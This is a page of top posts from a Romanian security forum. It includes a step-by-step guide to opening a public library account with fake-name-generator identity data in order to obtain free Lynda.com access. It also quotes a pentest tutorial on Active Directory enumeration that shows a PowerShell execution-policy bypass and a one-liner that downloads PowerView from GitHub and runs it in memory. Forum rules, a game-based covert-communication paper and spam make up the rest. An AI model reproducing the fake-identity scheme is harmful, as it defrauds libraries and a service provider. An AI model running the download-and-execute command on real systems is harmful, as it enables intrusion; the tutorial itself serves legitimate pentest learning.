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  1. 1. Intrati pe Cuyahoga County Public Library 2. Click pe "My Account" si apoi "Create Account" 2. Deschideti Fake Name Generator 3. Introduceti datele de pe Fake Name Generator in contul de Cuyahoga Library, cu doua mentiuni: puneti cod postal de Ohio si adresa de e-mail la care sa aveti acces. 4. Intrati pe E-Mail si copiati Acces Number-ul, dupa care va logati pe Cuyahoga County Public Library, introduceti doar Acces Number-ul, dupa care va pune sa va creati un PIN Number format din 4 cifre. 5. Intrati pe Lynda.com, selectati "Sign In", dupa care selectati "Sign in with your organization portal". Acolo introduceti link-ul de la librarie, dupa care Acces Number-ul si PIN-ul pe care tocmai vi l-ati ales. Si gata, aveti cont. Daca aveti intrebari, intrebati-ma in mod inteligent. Daca stiati deja asta, puteti sari peste topic. Nu stiu cat dureaza chestia asta, insa chiar si o luna daca aveti acces, este ok. Va ia maxim 5 minute sa creati tot ceea ce am explicat mai sus. Hai bafta. EDIT: Nu numai la Cuyahoga Library merge. Puteti intra pe Free Library si va alegeti de acolo o librarie, insa una care sa emita card online. Cu tot cu AN si PIN.
    1 point
  2. Copy/paste la regulile de aici... ce penibil
    1 point
  3. Salut; am avut saptamana trecuta ideea de a crea o metoda de comunicare folosind CS: GO. Ca si guideline, Hwyl a trebuit sa respecte urmatoarele - sa fie usor de folosit (ie fara scripturi si fara a injecta nimic in executabil), sa nu "strice" jocul sau sa trezeasca suspiciuni unui spectator si sa nu fie nevoie de echipament special (ie. poti sa joci si fara microfon). In esenta, tot echipamentul (purchasable items) este notat cu o variabila (inclusiv combinatiile dintre arma secundara eg Deagle si primara eg AWP + HE), actiunile (comenzi radio,), grafitti si team dynamics (pozitionare site etc). Anyway, aici e paper-ul pentru cei interesati: https://github.com/cionutmihai/Hwyl/blob/master/Hwyl.pdf Am facut si un clip scurt de 9 min cu niste highlight-uri, l-am pus pe PeerTube acum cateva min dar e inca la etapa de transcoding... : https://peertube.video/videos/watch/8f6b0f5a-4063-4411-9f53-fc2b5895ff3a Evident, fara a avea un tabel cu notatiile si insemnatatea lor nu intelegi nimic, asta e si ideea Have fun
    1 point
  4. interesanta ideea stau si ma intreb oare Rusii nu o folosesc deja ?
    1 point
  5. Active Directory Penetration Dojo – AD Environment Enumeration -1 Hi everyone, we’ve discussed basics of Active Directory and different servers in AD in previous blog posts of this series. If you’ve not yet read that, please find that here in Part 1 and Part 2. We’ve also understood trust relationships in AD environment. You can read post on trust relationships here. Let’s have a look at the current post in which we’ll discuss how to enumerate an active directory domain and map various entities, trusts, relationships and privileges in it. Few things to understand: LDAP is used by Active directory as its access protocol. So when you enumerate information from AD, your query is sent to it as an LDAP query. AD relies on DNS as its locator service that enables the clients to locate domain controllers and other hosts in the domain through DNS queries. AD Database is NTDS.DIT AD supports several Naming conventions like: User Principal name: winsaafman@scriptdotsh.local DN (Distinguished Names) LDAP names: CN = Common name OU = Organisational Unit DC = Domain For example- CN=winsaafman,DC=corp,DC=scriptdotsh,DC=local Any standard domain user can enumerate active directory information. There is no need for administrative rights (not even local administrator). We’ll be using powershell a lot in the enumeration stage. In powershell, you get warning on running the scripts because of the execution policy setting policy. Execution Policy is just a way to stop users from accidentally executing scripts. Not really a security control, because it has builtin bypass parameters. (powershell -ExecutionPolicy bypass) as you can see in screenshot below: If you don’t want to save powershell module on disk and just load directly into memory and run some of its command, you can try it like this: powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1’);Get-NetDomain” 1 powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1’);Get-NetDomain” Beside the -exec Bypass, there are several other ways to evade powershell blocking which is already there on the internet. So I won’t be talking much about that. We can use the ADSI, .NET classes, DSquery, Powershell frameworks, CMD, WMI, AD Module etc. for enumerating active directory. In current blogpost, we’ll enumerate the domain using the Active Directory powershell module and powerview. In the discovery phase, we have to analyse many things about the client environment and locate their PII, network architecture, devices, critical business applications etc. Then finding threats to those critical assets. And looking for misconfigurations, vulnerabilities and weaknesses. Articol complet: https://scriptdotsh.com/index.php/2019/01/01/active-directory-penetration-dojo-ad-environment-enumeration-1/
    1 point
  6. Ai incercat pe https://gloryholefoundation.com/riseofkings ?
    1 point
  7. [RO] Termeni si conditii - Administratorii acestui website nu isi asuma nicio responsabilitate pentru continutul acestui forum! Fiecare utilizator este responsabil pentru continutul creat! - Administratorii nu sunt responsabili pentru problemele aparute in urma folosirii informatiilor de pe acest website! - Administratorii acestui website nu isi asuma nicio responsabilitate pentru pagubele rezultate in urma vanzarii, cumpararii sau schimbului de bunuri sau servicii pe acest website! - Avem toleranta 0 pentru frauda sau informatii care faciliteaza frauda online sau bancara, inclusiv prin mesajele private (skimming, CC-uri, root-uri etc.). Orice abatere de la aceasta regula se pedepseste prin interzicerea permanenta pe website, iar datele voastre vor fi oferite organelor competente dac? ni se va cere acest lucru. De asemenea, administratorii isi rezerva dreptul de a interzice utilizatorilor accesul pe website in urma oricarei posibile activitati care pot fi legate de frauda online sau bancara. - Se interzice publicarea de continut ilegal sau fara drepturi de autor! Este interzisa publicarea de date cu caracter personal, conturi care nu va apartin, informatii de acces la diferite servere sau website-uri sau orice altceva care nu va apartine si care nu respecta legislatia in vigoare! - Acest website nu gazduieste fisiere fara drepturi de autor ci doar legaturi catre diferite servicii externe. Administratorii acestui website nu isi asuma responsabilitatea pentru continutul prezent pe servicii externe. Daca sunteti posesorii drepturilor de autor pentru informatii publicate pe acest website, luati legatura cu unul dintre administratori pentru eliminarea continutului. - Prin accesarea acestui website sunteti de acord cu termenii si conditiile si cu regulamentul acestui website! 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[RO] Regulament categorii: Free stuff - Nu se accepta root-uri, smtp-uri, vps-uri, rdp-uri etc. care nu va apartin - Nu se accepta conturi sau acces la diferite servicii care nu va apartin RST Market - Nu se accepta vanzarea, cumpararea sau schimbul de date care faciliteteaza frauda online sau bancara - Nu se accepta vanzarea, cumpararea sau schimbul de root-uri, smtp-uri, vps-uri, rdp-uri etc. care nu va apartin - Nu se accepta vanzarea, cumpararea sau schimbul de conturi care nu va apartin [EN] Terms and conditions - The administrators of this website do not take any responsibility for the content of the website! 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You are not allowed to attack or insult other persons on that chat and on the forum. 11. If you have more than one account you can be banned on all your accounts. 12. Posting vulnerabilities i websites that do not have a bug bounty program is forbidden. RST staff have the right to modify at any time the Terms and conditions and the rules of this forum without a notification. [EN] Category rules Free stuff: - It is forbidden to post or request root, vps, smtp or anything else that do not belong to you - It is forbidden to post accounts for different websites or services that do not belong to you RST Market: - It is forbidden to sell, buy or exchange data that facilitates online fraud or banking fraud - It is forbidden to sell, buy or exchange roots, vps, smtp, rdp or anything else that do not belong to you - It is forbidden to sell, buy or exchange accounts that do not belong to you
    1 point
  8. Atentie, nu oferiti si nu formulati cereri pentru servere hacked incluzand si nelimitandu-se la shells, cpanels, webshells. Nu vindeti si nu cereti baze de date cu email-uri, date cu caracter personal, cnp-uri sau alte saracii. In ultimul timp au aparut cereri si oferte precum ciupercile dupa ploaie. Nu le-am dat atentie pentru a vedea pana unde mergeti cu cacanaria.
    1 point
  9. Salut, Doresc sa va prezint https://masterweb.ro, o comunitate web noua, ce vreau sa o promovez cat mai mult si sa o popularizez. Daca aveti idei de promovare, sau/si doriti sa faceti parte din comunitatea MasterWeb va asteptam! Va multumesc!
    -2 points
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